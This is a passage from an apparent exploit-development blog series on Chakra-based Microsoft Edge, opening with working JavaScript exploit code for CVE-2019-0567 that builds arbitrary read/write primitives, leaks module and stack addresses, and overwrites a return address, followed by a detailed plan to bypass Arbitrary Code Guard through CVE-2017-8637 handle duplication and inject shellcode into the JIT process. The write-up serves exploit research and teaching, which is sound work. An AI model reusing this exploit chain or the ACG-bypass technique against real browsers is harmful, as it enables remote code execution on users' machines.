obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x450 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1])

    // Arbitrary read to get the threadContext pointer (offset 0x3b8)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

	// Counter variable
	let counter = 0x6000;

	// Loop
	while (counter != 0)
	{
	    // Store the contents of the stack
	    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

	    // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
			document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;

        }
        else
        {
        	// Decrement the counter
	    	// This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
	    	counter -= 0x8;
        }
	}

	// Corrupt the return address to control RIP with 0x4141414141414141
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
}
</script>

Open the updated exploit.html script and attach WinDbg before pressing the Click me to exploit CVE-2019-0567! button.

After attaching to WinDbg and pressing g, go ahead and click the button (may require clicking twice in some instance to detonate the exploit). Please note that sometimes there is a slight edge case where the return address isn’t located on the stack. So if the debugger shows you crashing on the GetValue method, this is likely a case of that. After testing, 10/10 times I found the return address. However, it is possible once in a while to not encounter it. It is very rare.

After running exploit.html in the debugger, we can clearly see that we have overwritten a return address on the stack with 0x4141414141414141 and Edge is attempting to return into it. We have, again, successfully corrupted control-flow and can now redirect execution wherever we want in Edge. We went over all of this, as well, in part two of this blog series!

Now that we have our read/write primitive and control-flow hijacking ported to Edge, we can now begin our Edge-specific exploitation which involves many ROP chains to bypass Edge mitigations like Arbitrary Code Guard.

Arbitrary Code Guard && Code Integrity Guard

We are now at a point where our exploit has the ability to read/write memory, we control the instruction pointer, and we know where the stack is. With these primitives, exploitation should be as follows (in terms of where exploit development currently and traditionally is at):

  1. Bypass ASLR to determine memory layout (done)
  2. Achieve read/write primitive (done)
  3. Locate the stack (done)
  4. Control the instruction pointer (done)
  5. Write a ROP payload to the stack (TBD)
  6. Write shellcode to the stack (or somewhere else in memory) (TBD)
  7. Mark the stack (or regions where shellcode is) as RWX (TBD)
  8. Execute shellcode (TBD)

Steps 5 through 8 are required as a result of DEP. DEP, a mitigation which has been beaten to death, separates code and data segments of memory. The stack, being a data segment of memory (it is only there to hold data), is not executable whenever DEP is enabled. Because of this, we invoke a function like VirtualProtect (via ROP) to mark the region of memory we wrote our shellcode to (which is a data segment that allows data to be written to it) as RWX. I have documented this procedure time and time again. We leak an address (or abuse non-ASLR modules, which is very rare now), we use our primitive to write to the stack (stack-based buffer overflow in the two previous links provided), we mark the stack as RWX via ROP (the shellcode is also on the stack) and we are now allowed to execute our shellcode since its in a RWX region of memory. With that said, let me introduce a new mitigation into the fold - Arbitrary Code Guard (ACG).

ACG is a mitigation which prohibits any dynamically-generated RWX memory. This is manifested in a few ways, pointed out by Matt Miller in his blog post on ACG. As Matt points out:

“With ACG enabled, the Windows kernel prevents a content process from creating and modifying code pages in memory by enforcing the following policy:

  1. Code pages are immutable. Existing code pages cannot be made writable and therefore always have their intended content. This is enforced with additional checks in the memory manager that prevent code pages from becoming writable or otherwise being modified by the process itself. For example, it is no longer possible to use VirtualProtect to make an image code page become PAGE_EXECUTE_READWRITE.

  2. New, unsigned code pages cannot be created. For example, it is no longer possible to use VirtualAlloc to create a new PAGE_EXECUTE_READWRITE code page.”

What this means is that an attacker can write their shellcode to a data portion of memory (like the stack) all they want, gladly. However, the permissions needed (e.g. the memory must be explicitly marked executable by the adversary) can never be achieved with ACG enabled. At a high level, no memory permissions in Edge (specifically content processes, where our exploit lives) can be modified (we can’t write our shellcode to a code page nor can we modify a data page to execute our shellcode).

Now, you may be thinking - “Connor, instead of executing native shellcode in this manner, why don’t you just use WinExec like in your previous exploit from part two of this blog series to spawn cmd.exe or some other application to download some staged DLL and just load it into the process space?” This is a perfectly valid thought - and, thus, has already been addressed by Microsoft.

Edge has another small mitigation known as “no child processes”. This nukes any ability to spawn a child process to go inject some shellcode into another process, or load a DLL. Not only that, even if there was no mitigation for child processes, there is a “sister” mitigation to ACG called Code Integrity Guard (CIG) which also is present in Edge.

CIG essentially says that only Microsoft-signed DLLs can be loaded into the process space. So, even if we could reach out to a retrieve a staged DLL and get it onto the system, it isn’t possible for us to load it into the content process, as the DLL isn’t a signed DLL (inferring the DLL is a malicious one, it wouldn’t be signed).

So, to summarize, in Edge we cannot:

  1. Use VirtualProtect to mark the stack where our shellcode is to RWX in order to execute it
  2. We can’t use VirtualProtect to make a code page (RX memory) to writable in order to write our shellcode to this region of memory (using something like a WriteProcessMemory ROP chain)
  3. We cannot allocate RWX memory within the current process space using VirtualAlloc
  4. We cannot allocate RW memory with VirtualAlloc and then mark it as RX
  5. We cannot allocate RX memory with VirtualAlloc and then mark it as RW

With the advent of all three of these mitigations, previous exploitation strategies are all thrown out of the window. Let’s talk about how this changes our exploit strategy, now knowing we cannot just execute shellcode directly within the content process.

CVE-2017-8637 - Combining Vulnerabilities

As we hinted at, and briefly touched on earlier in this blog post, we know that something has to be done about JIT code with ACG enablement. This is because, by default, JIT code is generated as RWX. If we think about it, JIT’d code first starts out as an “empty” allocation (just like when we allocate some memory with VirtualAlloc). This memory is first marked as RW (it is writable because Chakra needs to actually write the code into it that will be executed into the allocation). We know that since there is no execute permission on this RW allocation, and this allocation has code that needs to be executed, the JIT engine has to change the region of memory to RX after its generated. This means the JIT engine has to generate dynamic code that has its memory permissions changed. Because of this, no JIT code can really be generated in an Edge process with ACG enabled. As pointed out in Matt’s blog post (and briefly mentioned by us) this architectural issue was addresses as follows:

“Modern web browsers achieve great performance by transforming JavaScript and other higher-level languages into native code. As a result, they inherently rely on the ability to generate some amount of unsigned native code in a content process. Enabling JIT compilers to work with ACG enabled is a non-trivial engineering task, but it is an investment that we’ve made for Microsoft Edge in the Windows 10 Creators Update. To support this, we moved the JIT functionality of Chakra into a separate process that runs in its own isolated sandbox. The JIT process is responsible for compiling JavaScript to native code and mapping it into the requesting content process. In this way, the content process itself is never allowed to directly map or modify its own JIT code pages.”

As we have already seen in this blog post, two processes are generated (JIT server and content process) and the JIT server is responsible for taking the JavaScript code from the content process and transforming it into machine code. This machine code is then mapped back into the content process with appropriate permissions (like that of the .text section, RX). The vulnerability (CVE-2017-8637) mentioned in this section of the blog post took advantage of a flaw in this architecture to compromise Edge fully and, thus, bypass ACG. Let’s talk about a bit about the architecture of the JIT server and content process communication channel first (please note that this vulnerability has been patched).

The last thing to note, however, is where Matt says that the JIT process was moved “…into a separate process that runs in its own isolated sandbox”. Notice how Matt did not say that it was moved into an ACG-compliant process (as we know, ACG isn’t compatible with JIT). Although the JIT process may be “sandboxed” it does not have ACG enabled. It does, however, have CIG and “no child processes” enabled. We will be taking advantage of the fact the JIT process doesn’t (and still to this day doesn’t, although the new V8 version of Edge only has ACG support in a special mode) have ACG enabled. With our ACG bypass, we will leverage a vulnerability with the way Chakra-based Edge managed communications (specifically via process a handle stored within the content process) to and from the JIT server. With that said, let’s move on.

Leaking The JIT Server Handle

The content process uses an RPC channel in order to communicate with the JIT server/process. I found this out by opening chakra.dll within IDA and searching for any functions which looked interesting and contained the word “JIT”. I found an interesting function named JITManager::ConnectRpcServer. What stood out to me immediately was a call to the function DuplicateHandle within JITManager::ConnectRpcServer.

If we look at ChakraCore we can see the source (which should be close between Chakra and ChakraCore) for this function. What was very interesting about this function is the fact that the first argument this function accepts is seemingly a “handle to the JIT process”.

Since chakra.dll contains the functionality of the Chakra JavaScript engine and since chakra.dll, as we know, is loaded into the content process - this functionality is accessible through the content process (where our exploit is running). This infers at some point the content process is doing something with what seems to be a handle to the JIT server. However, we know that the value of jitProcessHandle is supplied by the caller (e.g. the function which actually invokes JITManager::ConnectRpcServer). Using IDA, we can look for cross-references to this function to see what function is responsible for calling JITManager::ConnectRpcServer.

Taking a look at the above image, we can see the function ScriptEngine::SetJITConnectionInfo is responsible for calling JITManager::ConnectRpcServer and, thus, also for providing the JIT handle to the function. Let’s look at ScriptEngine::SetJITConnectionInfo to see exactly how this function provides the JIT handle to JITManager::ConnectRpcServer.

We know that the __fastcall calling convention is in use, and that the first argument of JITManager::ConnectRpcServer (as we saw in the ChakraCore code) is where the JIT handle goes. So, if we look at the above image, whatever is in RCX directly prior to the call to JITManager::ConnectRpcServer will be the JIT handle. We can see this value is gathered from a symbol called s_jitManager.

We know that this is the value that is going to be passed to the JITManager::ConnectRpcServer function in the RCX register - meaning that this symbol has to contain the handle to the JIT server. Let’s look again, once more, at JITManager::ConnectRpcServer (this time with some additional annotation).

We already know that RCX = s_jitManager when this function is executed. Looking deeper into the disassembly (almost directly before the DuplicateHandle call) we can see that s_jitManager+0x8 (a.k.a RCX at an offset of 0x8) is loaded into R14. R14 is then used as the lpTargetHandle parameter for the call to DuplicateHandle. Let’s take a look at DuplicateHandle’s prototype (don’t worry if this is confusing, I will provide a summation of the findings very shortly to make sense of this).

If we take a look at the description above, the lpTargetHandle will “…receive the duplicate handle…”. What this means is that DuplicateHandle is used in this case to duplicate a handle to the JIT server, and store the duplicated handle within s_jitManager+0x8 (a.k.a the content process will have a handle to the JIT server) We can base this on two things - the first being that we have anecdotal evidence through the name of the variable we located in ChakraCore, which is jitprocessHandle. Although Chakra isn’t identical to ChakraCore in every regard, Chakra is following the same convention here. Instead, however, of directly supplying the jitprocessHandle - Chakra seems to manage this information through a structure called s_jitManager. The second way we can confirm this is through hard evidence.

If we examine chakra!JITManager::s_jitManager+0x8 (where we have hypothesized the duplicated JIT handle will go) within WinDbg, we can clearly see that this is a handle to a process with PROCESS_DUP_HANDLE access. We can also use Process Hacker to examine the handles to and from MicrosoftEdgeCP.exe. First, run Process Hacker as an administrator. From there, double-click on the MicrosoftEdgeCP.exe content process (the one using the most RAM as we saw, PID 4172 in this case). From there, click on the Handles tab and then sort the handles numerically via the Handle tab by clicking on it until they are in ascending order.

If we then scroll down in this list of handles, we can see our handle of 0x314. Looking at the Name column, we can also see that this is a handle to another MicrosoftEdgeCP.exe process. Since we know there are only two (whenever exploit.html is spawned and no other tabs are open) instances of MicrosoftEdgeCP.exe, the other “content process” (as we saw earlier) must be our JIT server (PID 7392)!

Another way to confirm this is by clicking on the General tab of our content process (PID 4172). From there, we can click on the Details button next to Mitigation policies to confirm that ACG (called “Dynamic code prohibited” here) is enabled for the content process where our exploit is running.

However, if we look at the other content process (which should be our JIT server) we can confirm ACG is not running. Thus, indicating, we know exactly which process is our JIT server and which one is our content process. From now on, no matter how many instances of Edge are running on a given machine, a content process will always have a PROCESS_DUP_HANDLE handle to the JIT server located at chakra::JITManager::s_jitManager+0x8.

So, in summation, we know that s_jitManager+0x8 contains a handle to the JIT server, and it is readable from the content process (where our exploit is running). You may also be asking “why does the content process need to have a PROCESS_DUP_HANDLE handle to the JIT server?” We will come to this shortly.

Turning our attention back to the aforementioned analysis, we know we have a handle to the JIT server. You may be thinking - we could essentially just use our arbitrary read primitive to obtain this handle and then use it to perform some operations on the JIT process, since the JIT process doesn’t have ACG enabled! This may sound very enticing at first. However, let’s take a look at a malicious function like VirtualAllocEx for a second, which can allocate memory within a remote process via a supplied process handle (which we have). VirtualAllocEx documentation states that:

The handle must have the PROCESS_VM_OPERATION access right. For more information, see Process Security and Access Rights.

This “kills” our idea in its tracks - the handle we have only has the permission PROCESS_DUP_HANDLE. We don’t have the access rights to allocate memory in a remote process where perhaps ACG is disabled (like the JIT server). However, due to a vulnerability (CVE-2017-8637), there is actually a way we can abuse the handle stored within s_jitManager+0x8 (which is a handle to the JIT server). To understand this, let’s just take a few moments to understand why we even need a handle to the JIT server, from the content process, in the first place.

Let’s now turn out attention to this this Google Project Zero issue regarding the CVE.

We know that the JIT server (a different process) needs to map JIT’d code into the content process. As the issue explains:

In order to be able to map executable memory in the calling process, JIT process needs to have a handle of the calling process. So how does it get that handle? It is sent by the calling process as part of the ThreadContext structure. In order to send its handle to the JIT process, the calling process first needs to call DuplicateHandle on its (pseudo) handle.

The above is self explanatory. If you want to do process injection (e.g. map code into another process) you need a handle to that process. So, in the case of the JIT server - the JIT server knows it is going to need to inject some code into the content process. In order to do this, the JIT server needs a handle to the content process with permissions such as PROCESS_VM_OPERATION. So, in order for the JIT process to have a handle to the content process, the content process (as mentioned above) shares it with the JIT process. However, this is where things get interesting.

The way the content process will give its handle to the JIT server is by duplicating its own pseudo handle. According to Microsoft, a pseudo handle:

… is a special constant, currently (HANDLE)-1, that is interpreted as the current process handle.

So, in other words, a pseudo handle is a handle to the current process and it is only valid within context of the process it is generated in. So, for example, if the content process called GetCurrentProcess to obtain a pseudo handle which represents the content process (essentially a handle to itself), this pseudo handle wouldn’t be valid within the JIT process. This is because the pseudo handle only represents a handle to the process which called GetCurrentProcess. If GetCurrentProcess is called in the JIT process, the handle generated is only valid within the JIT process. It is just an “easy” way for a process to specify a handle to the current process. If you supplied this pseudo handle in a call to WriteProcessMemory, for instance, you would tell WriteProcessMemory “hey, any memory you are about to write to is found within the current process”. Additionally, this pseudo handle has PROCESS_ALL_ACCESS permissions.

Now that we know what a pseudo handle is, let’s revisit this sentiment:

The way the content process will give its handle to the JIT server is by duplicating its own pseudo handle.

What the content process will do is obtain its pseudo handle by calling GetCurrentProcess (which is only valid within the content process). This handle is then used in a call to DuplicateHandle. In other words, the content process will duplicate its pseudo handle. You may be thinking, however, “Connor you just told me that a pseudo handle can only be used by the process which called GetCurrentProcess. Since the content process called GetCurrentProcess, the pseudo handle will only be valid in the content process. We need a handle to the content process that can be used by another process, like the JIT server. How does duplicating the handle change the fact this pseudo handle can’t be shared outside of the content process, even though we are duplicating the handle?”

The answer is pretty straightforward - if we look in the GetCurrentProcess Remarks section we can see the following text:

A process can create a “real” handle to itself that is valid in the context of other processes, or that can be inherited by other processes, by specifying the pseudo handle as the source handle in a call to the DuplicateHandle function.

So, even though the pseudo handle only represents a handle to the current process and is only valid within the current process, the DuplicateHandle function has the ability to convert this pseudo handle, which is only valid within the current process (in our case, the current process is the content process where the pseudo handle to be duplicated exists) into an actual or real handle which can be leveraged by other processes. This is exactly why the content process will duplicate its pseudo handle - it allows the content process to create an actual handle to itself, with PROCESS_ALL_ACCESS permissions, which can be actively used by other processes (in our case, this duplicated handle can be used by the JIT server to map JIT’d code into the content process).

So, in totality, its possible for the content process to call GetCurrentProcess (which returns a PROCESS_ALL_ACCESS handle to the content process) and then use DuplicateHandle to duplicate this handle for the JIT server to use. However, where things get interesting is the third parameter of DuplicateHandle, which is hTargetProcessHandle. This parameter has the following description:

A handle to the process that is to receive the duplicated handle. The handle must have the PROCESS_DUP_HANDLE access right…

In our case, we know that the “process that is to receive the duplicated handle” is the JIT server. After all, we are trying to send a (duplicated) content process handle to the JIT server. This means that when the content process calls DuplicateHandle in order to duplicate its handle for the JIT server to use, according to this parameter, the JIT server also needs to have a handle to the content process with PROCESS_DUP_HANDLE. If this doesn’t make sense, re-read the description provided of hTargetProcessHandle. This is saying that this parameter requires a handle to the process where the duplicated handle is going to go (specifically a handle with PROCESS_DUP_HANDLE) permissions.

This means, in less words, that if the content process wants to call DuplicateHandle in order to send/share its handle to/with the JIT server so that the JIT server can map JIT’d code into the content process, the content process also needs a PROCESS_DUP_HANDLE to the JIT server.

This is the exact reason why the s_jitManager structure in the content process contains a PROCESS_DUP_HANDLE to the JIT server. Since the content process now has a PROCESS_DUP_HANDLE handle to the JIT server (s_jitManager+0x8), this s_jitManager+0x8 handle can be passed in to the hTargetProcessHandle parameter when the content process duplicates its handle via DuplicateHandle for the JIT server to use. So, to answer our initial question - the reason why this handle exists (why the content process has a handle to the JIT server) is so DuplicateHandle calls succeed where content processes need to send their handle to the JIT server!

As a point of contention, this architecture is no longer used and the issue was fixed according to Ivan:

This issue was fixed by using an undocumented system_handle IDL attribute to transfer the Content Process handle to the JIT Process. This leaves handle passing in the responsibility of the Windows RPC mechanism, so Content Process no longer needs to call DuplicateHandle() or have a handle to the JIT Process.

So, to beat this horse to death, let me concisely reiterate one last time:

  1. JIT process wants to inject JIT’d code into the content process. It needs a handle to the content process to inject this code
  2. In order to fulfill this need, the content process will duplicate its handle and pass it to the JIT server
  3. In order for a duplicated handle from process “A” (the content process) to be used by process “B” (the JIT server), process “B” (the JIT server) first needs to give its handle to process “A” (the content process) with PROCESS_DUP_HANDLE permissions. This is outlined by hTargetProcessHandle which requires “a handle to the process that is to receive the duplicated handle” when the content process calls DuplicateHandle to send its handle to the JIT process
  4. Content process first stores a handle to the JIT server with PROCESS_DUP_HANDLE to fulfill the needs of hTargetProcessHandle
  5. Now that the content process has a PROCESS_DUP_HANDLE to the JIT server, the content process can call DuplicateHandle to duplicate its own handle and pass it to the JIT server
  6. JIT server now has a handle to the content process

The issue with this is number three, as outlined by Microsoft:

A process that has some of the access rights noted here can use them to gain other access rights. For example, if process A has a handle to process B with PROCESS_DUP_HANDLE access, it can duplicate the pseudo handle for process B. This creates a handle that has maximum access to process B. For more information on pseudo handles, see GetCurrentProcess.

What Microsoft is saying here is that if a process has a handle to another process, and that handle has PROCESS_DUP_HANDLE permissions, it is possible to use another call to DuplicateHandle to obtain a full-fledged PROCESS_ALL_ACCESS handle. This is the exact scenario we currently have. Our content process has a PROCESS_DUP_HANDLE handle to the JIT process. As Microsoft points out, this can be dangerous because it is possible to call DuplicateHandle on this PROCESS_DUP_HANDLE handle in order to obtain a full-access handle to the JIT server! This would allow us to have the necessary handle permissions, as we showed earlier with VirtualAllocEx, to compromise the JIT server. The reason why CVE-2017-8637 is an ACG bypass is because the JIT server doesn’t have ACG enabled! If we, from the content process, can allocate memory and write shellcode into the JIT server (abusing this handle) we would compromise the JIT process and execute code, because ACG isn’t enabled there!

So, we could setup a call to DuplicateHandle as such:

DuplicateHandle(
	jitHandle,		// Leaked from s_jitManager+0x8 with PROCESS_DUP_HANDLE permissions
	GetCurrentProcess(),	// Pseudo handle to the current process
	GetCurrentProcess(),	// Pseudo handle to the current process
	&fulljitHandle,		// Variable we supply that will receive the PROCESS_ALL_ACCESS handle to the JIT server
	0,			// Ignored since we later specify DUPLICATE_SAME_ACCESS
	0,			// FALSE (handle can't be inherited)
	DUPLICATE_SAME_ACCESS	// Create handle with same permissions as source handle (source handle = GetCurrentProcessHandle() so PROCESS_ALL_ACCESS permissions)
);

Let’s talk about where these parameters came from.

  1. hSourceProcessHandle - “A handle to the process with the handle to be duplicated. The handle must have the PROCESS_DUP_HANDLE access right.”
    • The value we are passing here is jitHandle (which represents our PROCESS_DUP_HANDLE to the JIT server). As the parameter description says, we pass in the handle to the process where the “handle we want to duplicate exists”. Since we are passing in the PROCESS_DUP_HANDLE to the JIT server, this essentially tells DuplicateHandle that the handle we want to duplicate exists somewhere within this process (the JIT process).
  2. hSourceHandle - “The handle to be duplicated. This is an open object handle that is valid in the context of the source process.”
    • We supply a value of GetCurrentProcess here. What this means is that we are asking DuplicateHandle to duplicate a pseudo handle to the current process. In other words, we are asking DuplicateHandle to duplicate us a PROCESS_ALL_ACCESS handle. However, since we have passed in the JIT server as the hSourceProcessHandle parameter we are instead asking DuplicateHandle to “duplicate us a pseudo handle for the current process”, but we have told DuplicateHandl that our “current process” is the JIT process as we have changed our “process context” by telling DuplicateHandle to perform this operation in context of the JIT process. Normally GetCurrentProcess would return us a handle to the process in which the function call occurred in (which, in our exploit, will obviously happen within a ROP chain in the content process). However, we use the “trick” up our sleeve, which is the leaked handle to the JIT server we have stored in the content process. When we supply this handle, we “trick” DuplicateHandle into essentially duplicating a PROCESS_ALL_ACCESS handle within the JIT process instead.
  3. hTargetProcessHandle - “A handle to the process that is to receive the duplicated handle. The handle must have the PROCESS_DUP_HANDLE access right.”
    • We supply a value of GetCurrentProcess here. This makes sense, as we want to receive the full handle to the JIT server within the content process. Our exploit is executing within the content process so we tell DuplicateHandle that the process we want to receive this handle in context of is the current, or content process. This will allow the content process to use it later.
  4. lpTargetHandle - “A pointer to a variable that receives the duplicate handle. This handle value is valid in the context of the target process. If hSourceHandle is a pseudo handle returned by GetCurrentProcess or GetCurrentThread, DuplicateHandle converts it to a real handle to a process or thread, respectively.”
    • This is the most important part. Not only is this the variable that will receive our handle (fulljitHandle just represents a memory address where we want to store this handle. In our exploit we will just find an empty .data address to store it in), but the second part of the parameter description is equally as important. We know that for hSourceHandle we supplied a pseudo handle via GetCurrentProcess. This description essentially says that DuplicateHandle will convert this pseudo handle in hSourceHandle into a real handle when the function completes. As we mentioned, we are using a “trick” with our hSourceProcessHandle being the JIT server and our hSourceHandle being a pseudo handle. We, as mentioned, are telling Edge to search within the JIT process for a pseudo handle “to the current process”, which is the JIT process. However, a pseudo handle would really only be usable in context of the process where it was being obtained from. So, for instance, if we obtained a pseudo handle to the JIT process it would only be usable within the JIT process. This isn’t ideal, because our exploit is within the content process and any handle that is only usable within the JIT process itself is useless to us. However, since DuplicateHandle will convert the pseudo handle to a real handle, this real handle is usable by other processes. This essentially means our call to DuplicateHandle will provide us with an actual handle with PROCESS_ALL_ACCESS to the JIT server from another process (from the content process in our case).
  5. dwDesiredAccess - “The access requested for the new handle. For the flags that can be specified for each object type, see the following Remarks section. This parameter is ignored if the dwOptions parameter specifies the DUPLICATE_SAME_ACCESS flag…”
    • We will be supplying the DUPLICATE_SAME_ACCESS flag later, meaning we can set this to 0.
  6. bInheritHandle - “A variable that indicates whether the handle is inheritable. If TRUE, the duplicate handle can be inherited by new processes created by the target process. If FALSE, the new handle cannot be inherited.”
    • Here we set the value to FALSE. We don’t want to/nor do we care if this handle is inheritable.
  7. dwOptions - “Optional actions. This parameter can be zero, or any combination of the following values.”
    • Here we provide 2, or DUPLICATE_SAME_ACCESS. This instructs DuplicateHandle that we want our duplicate handle to have the same permissions as the handle provided by the source. Since we provided a pseudo handle as the source, which has PROCESS_ALL_ACCESS, our final duplicated handle fulljitHandle will have a real PROCESS_ALL_ACCESS handle to the JIT server which can be used by the content process.

If this all sounds confusing, take a few moments to keep reading the above. Additionally, here is a summation of what I said:

  1. DuplicateHandle let’s you decide in what process the handle you want to duplicate exists. We tell DuplicateHandle that we want to duplicate a handle within the JIT process, using the low-permission PROCESS_DUP_HANDLE handle we have leaked from s_jitManager.
  2. We then tell DuplicateHandle the handle we want to duplicate within the JIT server is a GetCurrentProcess pseudo handle. This handle has PROCESS_ALL_ACCESS
  3. Although GetCurrentProcess returns a handle only usable by the process which called it, DuplicateHandle will perform a conversion under the hood to convert this to an actual handle which other processes can use
  4. Lastly, we tell DuplicateHandle we want a real handle to the JIT server, which we can use from the content process, with PROCESS_ALL_ACCESS permissions via the DUPLICATE_SAME_ACCESS flag which will tell DuplicateHandle to duplicate the handle with the same permissions as the pseudo handle (which is PROCESS_ALL_ACCESS).

Again, just keep re-reading over this and thinking about it logically. If you still have questions, feel free to email me. It can get confusing pretty quickly (at least to me).

Now that we are armed with the above information, it is time to start outline our exploitation plan.

Exploitation Plan 2.0

Let’s briefly take a second to rehash where we are at:

  1. We have an ASLR bypass and we know the layout of memory
  2. We can read/write anywhere in memory as much or as little as we want
  3. We can direct program execution to wherever we want in memory
  4. We know where the stack is and can force Edge to start executing our ROP chain

However, we know the pesky mitigations of ACG, CIG, and “no child processes” are still in our way. We can’t just execute our payload because we can’t make our payload as executable. So, with that said, the first option one could take is using a pure data-only attack. We could programmatically, via ROP, build out a reverse shell. This is very cumbersome and could take thousands of ROP gadgets. Although this is always a viable alternative, we want to detonate actual shellcode somehow. So, the approach we will take is as follows:

  1. Abuse CVE-2017-8637 to obtain a PROCESS_ALL_ACCESS handle to the JIT process
  2. ACG is disabled within the JIT process. Use our ability to execute a ROP chain in the content process to write our payload to the JIT process
  3. Execute our payload within the JIT process to obtain shellcode execution (essentially perform process injection to inject a payload to the JIT process where ACG is disabled)

To break down how we will actually accomplish step 2 in even greater detail, let’s first outline some stipulations about processes protected by ACG. We know that the content process (where our exploit will execute) is protected by ACG. We know that the JIT server is not protected by ACG. We already know that a process not protected by ACG is allowed to inject into a process that is protected by ACG. We clearly see this with the out-of-process JIT architecture of Edge. The JIT server (not protected by ACG) injects code into the content process (protected by ACG) - this is expected behavior. However, what about a injection from a process that is protected by ACG into a process that is not protected by ACG (e.g. injection from the content process into the JIT process, which we are attempting to do)?

